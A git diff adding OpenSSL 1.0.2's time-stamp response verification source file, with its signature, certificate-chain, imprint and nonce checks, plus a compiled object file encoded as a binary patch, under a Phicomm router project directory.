+#define TS_FAILURE_INFO_SIZE    (sizeof(TS_failure_info) / \
+                                sizeof(*TS_failure_info))
+
+/* Functions for verifying a signed TS_TST_INFO structure. */
+
+/*-
+ * This function carries out the following tasks:
+ *      - Checks if there is one and only one signer.
+ *      - Search for the signing certificate in 'certs' and in the response.
+ *      - Check the extended key usage and key usage fields of the signer
+ *      certificate (done by the path validation).
+ *      - Build and validate the certificate path.
+ *      - Check if the certificate path meets the requirements of the
+ *      SigningCertificate ESS signed attribute.
+ *      - Verify the signature value.
+ *      - Returns the signer certificate in 'signer', if 'signer' is not NULL.
+ */
+int TS_RESP_verify_signature(PKCS7 *token, STACK_OF(X509) *certs,
+                             X509_STORE *store, X509 **signer_out)
+{
+    STACK_OF(PKCS7_SIGNER_INFO) *sinfos = NULL;
+    PKCS7_SIGNER_INFO *si;
+    STACK_OF(X509) *signers = NULL;
+    X509 *signer;
+    STACK_OF(X509) *chain = NULL;
+    char buf[4096];
+    int i, j = 0, ret = 0;
+    BIO *p7bio = NULL;
+
+    /* Some sanity checks first. */
+    if (!token) {
+        TSerr(TS_F_TS_RESP_VERIFY_SIGNATURE, TS_R_INVALID_NULL_POINTER);
+        goto err;
+    }
+
+    /* Check for the correct content type */
+    if (!PKCS7_type_is_signed(token)) {
+        TSerr(TS_F_TS_RESP_VERIFY_SIGNATURE, TS_R_WRONG_CONTENT_TYPE);
+        goto err;
+    }
+
+    /* Check if there is one and only one signer. */
+    sinfos = PKCS7_get_signer_info(token);
+    if (!sinfos || sk_PKCS7_SIGNER_INFO_num(sinfos) != 1) {
+        TSerr(TS_F_TS_RESP_VERIFY_SIGNATURE, TS_R_THERE_MUST_BE_ONE_SIGNER);
+        goto err;
+    }
+    si = sk_PKCS7_SIGNER_INFO_value(sinfos, 0);
+
+    /* Check for no content: no data to verify signature. */
+    if (PKCS7_get_detached(token)) {
+        TSerr(TS_F_TS_RESP_VERIFY_SIGNATURE, TS_R_NO_CONTENT);
+        goto err;
+    }
+
+    /*
+     * Get hold of the signer certificate, search only internal certificates
+     * if it was requested.
+     */
+    signers = PKCS7_get0_signers(token, certs, 0);
+    if (!signers || sk_X509_num(signers) != 1)
+        goto err;
+    signer = sk_X509_value(signers, 0);
+
+    /* Now verify the certificate. */
+    if (!TS_verify_cert(store, certs, signer, &chain))
+        goto err;
+
+    /*
+     * Check if the signer certificate is consistent with the ESS extension.
+     */
+    if (!TS_check_signing_certs(si, chain))
+        goto err;
+
+    /* Creating the message digest. */
+    p7bio = PKCS7_dataInit(token, NULL);
+
+    /* We now have to 'read' from p7bio to calculate digests etc. */
+    while ((i = BIO_read(p7bio, buf, sizeof(buf))) > 0) ;
+
+    /* Verifying the signature. */
+    j = PKCS7_signatureVerify(p7bio, token, si, signer);
+    if (j <= 0) {
+        TSerr(TS_F_TS_RESP_VERIFY_SIGNATURE, TS_R_SIGNATURE_FAILURE);
+        goto err;
+    }
+
+    /* Return the signer certificate if needed. */
+    if (signer_out) {
+        *signer_out = signer;
+        CRYPTO_add(&signer->references, 1, CRYPTO_LOCK_X509);
+    }
+
+    ret = 1;
+
+ err:
+    BIO_free_all(p7bio);
+    sk_X509_pop_free(chain, X509_free);
+    sk_X509_free(signers);
+
+    return ret;
+}
+
+/*
+ * The certificate chain is returned in chain. Caller is responsible for
+ * freeing the vector.
+ */
+static int TS_verify_cert(X509_STORE *store, STACK_OF(X509) *untrusted,
+                          X509 *signer, STACK_OF(X509) **chain)
+{
+    X509_STORE_CTX cert_ctx;
+    int i;
+    int ret = 1;
+
+    /* chain is an out argument. */
+    *chain = NULL;
+    X509_STORE_CTX_init(&cert_ctx, store, signer, untrusted);
+    X509_STORE_CTX_set_purpose(&cert_ctx, X509_PURPOSE_TIMESTAMP_SIGN);
+    i = X509_verify_cert(&cert_ctx);
+    if (i <= 0) {
+        int j = X509_STORE_CTX_get_error(&cert_ctx);
+        TSerr(TS_F_TS_VERIFY_CERT, TS_R_CERTIFICATE_VERIFY_ERROR);
+        ERR_add_error_data(2, "Verify error:",
+                           X509_verify_cert_error_string(j));
+        ret = 0;
+    } else {
+        /* Get a copy of the certificate chain. */
+        *chain = X509_STORE_CTX_get1_chain(&cert_ctx);
+    }
+
+    X509_STORE_CTX_cleanup(&cert_ctx);
+
+    return ret;
+}
+
+static int TS_check_signing_certs(PKCS7_SIGNER_INFO *si,
+                                  STACK_OF(X509) *chain)
+{
+    ESS_SIGNING_CERT *ss = ESS_get_signing_cert(si);
+    STACK_OF(ESS_CERT_ID) *cert_ids = NULL;
+    X509 *cert;
+    int i = 0;
+    int ret = 0;
+
+    if (!ss)
+        goto err;
+    cert_ids = ss->cert_ids;
+    /* The signer certificate must be the first in cert_ids. */
+    cert = sk_X509_value(chain, 0);
+    if (TS_find_cert(cert_ids, cert) != 0)
+        goto err;
+
+    /*
+     * Check the other certificates of the chain if there are more than one
+     * certificate ids in cert_ids.
+     */
+    if (sk_ESS_CERT_ID_num(cert_ids) > 1) {
+        /* All the certificates of the chain must be in cert_ids. */
+        for (i = 1; i < sk_X509_num(chain); ++i) {
+            cert = sk_X509_value(chain, i);
+            if (TS_find_cert(cert_ids, cert) < 0)
+                goto err;
+        }
+    }
+    ret = 1;
+ err:
+    if (!ret)
+        TSerr(TS_F_TS_CHECK_SIGNING_CERTS,
+              TS_R_ESS_SIGNING_CERTIFICATE_ERROR);
+    ESS_SIGNING_CERT_free(ss);
+    return ret;
+}
+
+static ESS_SIGNING_CERT *ESS_get_signing_cert(PKCS7_SIGNER_INFO *si)
+{
+    ASN1_TYPE *attr;
+    const unsigned char *p;
+    attr = PKCS7_get_signed_attribute(si, NID_id_smime_aa_signingCertificate);
+    if (!attr)
+        return NULL;
+    p = attr->value.sequence->data;
+    return d2i_ESS_SIGNING_CERT(NULL, &p, attr->value.sequence->length);
+}
+
+/* Returns < 0 if certificate is not found, certificate index otherwise. */
+static int TS_find_cert(STACK_OF(ESS_CERT_ID) *cert_ids, X509 *cert)
+{
+    int i;
+
+    if (!cert_ids || !cert)
+        return -1;
+
+    /* Recompute SHA1 hash of certificate if necessary (side effect). */
+    X509_check_purpose(cert, -1, 0);
+
+    /* Look for cert in the cert_ids vector. */
+    for (i = 0; i < sk_ESS_CERT_ID_num(cert_ids); ++i) {
+        ESS_CERT_ID *cid = sk_ESS_CERT_ID_value(cert_ids, i);
+
+        /* Check the SHA-1 hash first. */
+        if (cid->hash->length == sizeof(cert->sha1_hash)
+            && !memcmp(cid->hash->data, cert->sha1_hash,
+                       sizeof(cert->sha1_hash))) {
+            /* Check the issuer/serial as well if specified. */
+            ESS_ISSUER_SERIAL *is = cid->issuer_serial;
+            if (!is || !TS_issuer_serial_cmp(is, cert->cert_info))
+                return i;
+        }
+    }
+
+    return -1;
+}
+
+static int TS_issuer_serial_cmp(ESS_ISSUER_SERIAL *is, X509_CINF *cinfo)
+{
+    GENERAL_NAME *issuer;
+
+    if (!is || !cinfo || sk_GENERAL_NAME_num(is->issuer) != 1)
+        return -1;
+
+    /* Check the issuer first. It must be a directory name. */
+    issuer = sk_GENERAL_NAME_value(is->issuer, 0);
+    if (issuer->type != GEN_DIRNAME
+        || X509_NAME_cmp(issuer->d.dirn, cinfo->issuer))
+        return -1;
+
+    /* Check the serial number, too. */
+    if (ASN1_INTEGER_cmp(is->serial, cinfo->serialNumber))
+        return -1;
+
+    return 0;
+}
+
+/*-
+ * Verifies whether 'response' contains a valid response with regards
+ * to the settings of the context:
+ *      - Gives an error message if the TS_TST_INFO is not present.
+ *      - Calls _TS_RESP_verify_token to verify the token content.
+ */
+int TS_RESP_verify_response(TS_VERIFY_CTX *ctx, TS_RESP *response)
+{
+    PKCS7 *token = TS_RESP_get_token(response);
+    TS_TST_INFO *tst_info = TS_RESP_get_tst_info(response);
+    int ret = 0;
+
+    /* Check if we have a successful TS_TST_INFO object in place. */
+    if (!TS_check_status_info(response))
+        goto err;
+
+    /* Check the contents of the time stamp token. */
+    if (!int_TS_RESP_verify_token(ctx, token, tst_info))
+        goto err;
+
+    ret = 1;
+ err:
+    return ret;
+}
+
+/*
+ * Tries to extract a TS_TST_INFO structure from the PKCS7 token and
+ * calls the internal int_TS_RESP_verify_token function for verifying it.
+ */
+int TS_RESP_verify_token(TS_VERIFY_CTX *ctx, PKCS7 *token)
+{
+    TS_TST_INFO *tst_info = PKCS7_to_TS_TST_INFO(token);
+    int ret = 0;
+    if (tst_info) {
+        ret = int_TS_RESP_verify_token(ctx, token, tst_info);
+        TS_TST_INFO_free(tst_info);
+    }
+    return ret;
+}
+
+/*-
+ * Verifies whether the 'token' contains a valid time stamp token
+ * with regards to the settings of the context. Only those checks are
+ * carried out that are specified in the context:
+ *      - Verifies the signature of the TS_TST_INFO.
+ *      - Checks the version number of the response.
+ *      - Check if the requested and returned policies math.
+ *      - Check if the message imprints are the same.
+ *      - Check if the nonces are the same.
+ *      - Check if the TSA name matches the signer.
+ *      - Check if the TSA name is the expected TSA.
+ */
+static int int_TS_RESP_verify_token(TS_VERIFY_CTX *ctx,
+                                    PKCS7 *token, TS_TST_INFO *tst_info)
+{
+    X509 *signer = NULL;
+    GENERAL_NAME *tsa_name = TS_TST_INFO_get_tsa(tst_info);
+    X509_ALGOR *md_alg = NULL;
+    unsigned char *imprint = NULL;
+    unsigned imprint_len = 0;
+    int ret = 0;
+
+    /* Verify the signature. */
+    if ((ctx->flags & TS_VFY_SIGNATURE)
+        && !TS_RESP_verify_signature(token, ctx->certs, ctx->store, &signer))
+        goto err;
+
+    /* Check version number of response. */
+    if ((ctx->flags & TS_VFY_VERSION)
+        && TS_TST_INFO_get_version(tst_info) != 1) {
+        TSerr(TS_F_INT_TS_RESP_VERIFY_TOKEN, TS_R_UNSUPPORTED_VERSION);
+        goto err;
+    }
+
+    /* Check policies. */
+    if ((ctx->flags & TS_VFY_POLICY)
+        && !TS_check_policy(ctx->policy, tst_info))
+        goto err;
+
+    /* Check message imprints. */
+    if ((ctx->flags & TS_VFY_IMPRINT)
+        && !TS_check_imprints(ctx->md_alg, ctx->imprint, ctx->imprint_len,
+                              tst_info))
+        goto err;
+
+    /* Compute and check message imprints. */
+    if ((ctx->flags & TS_VFY_DATA)
+        && (!TS_compute_imprint(ctx->data, tst_info,
+                                &md_alg, &imprint, &imprint_len)
+            || !TS_check_imprints(md_alg, imprint, imprint_len, tst_info)))
+        goto err;
+
+    /* Check nonces. */
+    if ((ctx->flags & TS_VFY_NONCE)
+        && !TS_check_nonces(ctx->nonce, tst_info))
+        goto err;
+
+    /* Check whether TSA name and signer certificate match. */
+    if ((ctx->flags & TS_VFY_SIGNER)
+        && tsa_name && !TS_check_signer_name(tsa_name, signer)) {
+        TSerr(TS_F_INT_TS_RESP_VERIFY_TOKEN, TS_R_TSA_NAME_MISMATCH);
+        goto err;
+    }
+
+    /* Check whether the TSA is the expected one. */
+    if ((ctx->flags & TS_VFY_TSA_NAME)
+        && !TS_check_signer_name(ctx->tsa_name, signer)) {
+        TSerr(TS_F_INT_TS_RESP_VERIFY_TOKEN, TS_R_TSA_UNTRUSTED);
+        goto err;
+    }
+
+    ret = 1;
+ err:
+    X509_free(signer);
+    X509_ALGOR_free(md_alg);
+    OPENSSL_free(imprint);
+    return ret;
+}
+
+static int TS_check_status_info(TS_RESP *response)
+{
+    TS_STATUS_INFO *info = TS_RESP_get_status_info(response);
+    long status = ASN1_INTEGER_get(info->status);
+    const char *status_text = NULL;
+    char *embedded_status_text = NULL;
+    char failure_text[TS_STATUS_BUF_SIZE] = "";
+
+    /* Check if everything went fine. */
+    if (status == 0 || status == 1)
+        return 1;
+
+    /* There was an error, get the description in status_text. */
+    if (0 <= status && status < (long)TS_STATUS_TEXT_SIZE)
+        status_text = TS_status_text[status];
+    else
+        status_text = "unknown code";
+
+    /* Set the embedded_status_text to the returned description. */
+    if (sk_ASN1_UTF8STRING_num(info->text) > 0
+        && !(embedded_status_text = TS_get_status_text(info->text)))
+        return 0;
+
+    /* Filling in failure_text with the failure information. */
+    if (info->failure_info) {
+        int i;
+        int first = 1;
+        for (i = 0; i < (int)TS_FAILURE_INFO_SIZE; ++i) {
+            if (ASN1_BIT_STRING_get_bit(info->failure_info,
+                                        TS_failure_info[i].code)) {
+                if (!first)
+                    strcpy(failure_text, ",");
+                else
+                    first = 0;
+                strcat(failure_text, TS_failure_info[i].text);
+            }
+        }
+    }
+    if (failure_text[0] == '\0')
+        strcpy(failure_text, "unspecified");
+
+    /* Making up the error string. */
+    TSerr(TS_F_TS_CHECK_STATUS_INFO, TS_R_NO_TIME_STAMP_TOKEN);
+    ERR_add_error_data(6,
+                       "status code: ", status_text,
+                       ", status text: ", embedded_status_text ?
+                       embedded_status_text : "unspecified",
+                       ", failure codes: ", failure_text);
+    OPENSSL_free(embedded_status_text);
+
+    return 0;
+}
+
+static char *TS_get_status_text(STACK_OF(ASN1_UTF8STRING) *text)
+{
+    int i;
+    unsigned int length = 0;
+    char *result = NULL;
+    char *p;
+
+    /* Determine length first. */
+    for (i = 0; i < sk_ASN1_UTF8STRING_num(text); ++i) {
+        ASN1_UTF8STRING *current = sk_ASN1_UTF8STRING_value(text, i);
+        length += ASN1_STRING_length(current);
+        length += 1;            /* separator character */
+    }
+    /* Allocate memory (closing '\0' included). */
+    if (!(result = OPENSSL_malloc(length))) {
+        TSerr(TS_F_TS_GET_STATUS_TEXT, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    /* Concatenate the descriptions. */
+    for (i = 0, p = result; i < sk_ASN1_UTF8STRING_num(text); ++i) {
+        ASN1_UTF8STRING *current = sk_ASN1_UTF8STRING_value(text, i);
+        length = ASN1_STRING_length(current);
+        if (i > 0)
+            *p++ = '/';
+        strncpy(p, (const char *)ASN1_STRING_data(current), length);
+        p += length;
+    }
+    /* We do have space for this, too. */
+    *p = '\0';
+
+    return result;
+}
+
+static int TS_check_policy(ASN1_OBJECT *req_oid, TS_TST_INFO *tst_info)
+{
+    ASN1_OBJECT *resp_oid = TS_TST_INFO_get_policy_id(tst_info);
+
+    if (OBJ_cmp(req_oid, resp_oid) != 0) {
+        TSerr(TS_F_TS_CHECK_POLICY, TS_R_POLICY_MISMATCH);
+        return 0;
+    }
+
+    return 1;
+}
+
+static int TS_compute_imprint(BIO *data, TS_TST_INFO *tst_info,
+                              X509_ALGOR **md_alg,
+                              unsigned char **imprint, unsigned *imprint_len)
+{
+    TS_MSG_IMPRINT *msg_imprint = TS_TST_INFO_get_msg_imprint(tst_info);
+    X509_ALGOR *md_alg_resp = TS_MSG_IMPRINT_get_algo(msg_imprint);
+    const EVP_MD *md;
+    EVP_MD_CTX md_ctx;
+    unsigned char buffer[4096];
+    int length;
+
+    *md_alg = NULL;
+    *imprint = NULL;
+
+    /* Return the MD algorithm of the response. */
+    if (!(*md_alg = X509_ALGOR_dup(md_alg_resp)))
+        goto err;
+
+    /* Getting the MD object. */
+    if (!(md = EVP_get_digestbyobj((*md_alg)->algorithm))) {
+        TSerr(TS_F_TS_COMPUTE_IMPRINT, TS_R_UNSUPPORTED_MD_ALGORITHM);
+        goto err;
+    }
+
+    /* Compute message digest. */
+    length = EVP_MD_size(md);
+    if (length < 0)
+        goto err;
+    *imprint_len = length;
+    if (!(*imprint = OPENSSL_malloc(*imprint_len))) {
+        TSerr(TS_F_TS_COMPUTE_IMPRINT, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    if (!EVP_DigestInit(&md_ctx, md))
+        goto err;
+    while ((length = BIO_read(data, buffer, sizeof(buffer))) > 0) {
+        if (!EVP_DigestUpdate(&md_ctx, buffer, length))
+            goto err;
+    }
+    if (!EVP_DigestFinal(&md_ctx, *imprint, NULL))
+        goto err;
+
+    return 1;
+ err:
+    X509_ALGOR_free(*md_alg);
+    OPENSSL_free(*imprint);
+    *imprint_len = 0;
+    *imprint = 0;
+    return 0;
+}
+
+static int TS_check_imprints(X509_ALGOR *algor_a,
+                             unsigned char *imprint_a, unsigned len_a,
+                             TS_TST_INFO *tst_info)
+{
+    TS_MSG_IMPRINT *b = TS_TST_INFO_get_msg_imprint(tst_info);
+    X509_ALGOR *algor_b = TS_MSG_IMPRINT_get_algo(b);
+    int ret = 0;
+
+    /* algor_a is optional. */
+    if (algor_a) {
+        /* Compare algorithm OIDs. */
+        if (OBJ_cmp(algor_a->algorithm, algor_b->algorithm))
+            goto err;
+
+        /* The parameter must be NULL in both. */
+        if ((algor_a->parameter
+             && ASN1_TYPE_get(algor_a->parameter) != V_ASN1_NULL)
+            || (algor_b->parameter
+                && ASN1_TYPE_get(algor_b->parameter) != V_ASN1_NULL))
+            goto err;
+    }
+
+    /* Compare octet strings. */
+    ret = len_a == (unsigned)ASN1_STRING_length(b->hashed_msg) &&
+        memcmp(imprint_a, ASN1_STRING_data(b->hashed_msg), len_a) == 0;
+ err:
+    if (!ret)
+        TSerr(TS_F_TS_CHECK_IMPRINTS, TS_R_MESSAGE_IMPRINT_MISMATCH);
+    return ret;
+}
+
+static int TS_check_nonces(const ASN1_INTEGER *a, TS_TST_INFO *tst_info)
+{
+    const ASN1_INTEGER *b = TS_TST_INFO_get_nonce(tst_info);
+
+    /* Error if nonce is missing. */
+    if (!b) {
+        TSerr(TS_F_TS_CHECK_NONCES, TS_R_NONCE_NOT_RETURNED);
+        return 0;
+    }
+
+    /* No error if a nonce is returned without being requested. */
+    if (ASN1_INTEGER_cmp(a, b) != 0) {
+        TSerr(TS_F_TS_CHECK_NONCES, TS_R_NONCE_MISMATCH);
+        return 0;
+    }
+
+    return 1;
+}
+
+/*
+ * Check if the specified TSA name matches either the subject or one of the
+ * subject alternative names of the TSA certificate.
+ */
+static int TS_check_signer_name(GENERAL_NAME *tsa_name, X509 *signer)
+{
+    STACK_OF(GENERAL_NAME) *gen_names = NULL;
+    int idx = -1;
+    int found = 0;
+
+    /* Check the subject name first. */
+    if (tsa_name->type == GEN_DIRNAME
+        && X509_name_cmp(tsa_name->d.dirn, signer->cert_info->subject) == 0)
+        return 1;
+
+    /* Check all the alternative names. */
+    gen_names = X509_get_ext_d2i(signer, NID_subject_alt_name, NULL, &idx);
+    while (gen_names != NULL
+           && !(found = TS_find_name(gen_names, tsa_name) >= 0)) {
+        /*
+         * Get the next subject alternative name, although there should be no
+         * more than one.
+         */
+        GENERAL_NAMES_free(gen_names);
+        gen_names = X509_get_ext_d2i(signer, NID_subject_alt_name,
+                                     NULL, &idx);
+    }
+    if (gen_names)
+        GENERAL_NAMES_free(gen_names);
+
+    return found;
+}
+
+/* Returns 1 if name is in gen_names, 0 otherwise. */
+static int TS_find_name(STACK_OF(GENERAL_NAME) *gen_names, GENERAL_NAME *name)
+{
+    int i, found;
+    for (i = 0, found = 0; !found && i < sk_GENERAL_NAME_num(gen_names); ++i) {
+        GENERAL_NAME *current = sk_GENERAL_NAME_value(gen_names, i);
+        found = GENERAL_NAME_cmp(current, name) == 0;
+    }
+    return found ? i - 1 : -1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_rsp_verify.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_rsp_verify.o
new file mode 100644
index 0000000000000000000000000000000000000000..8cee93ea945e042f601a8a420686f9c06615ba1c
GIT binary patch
literal 12824
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
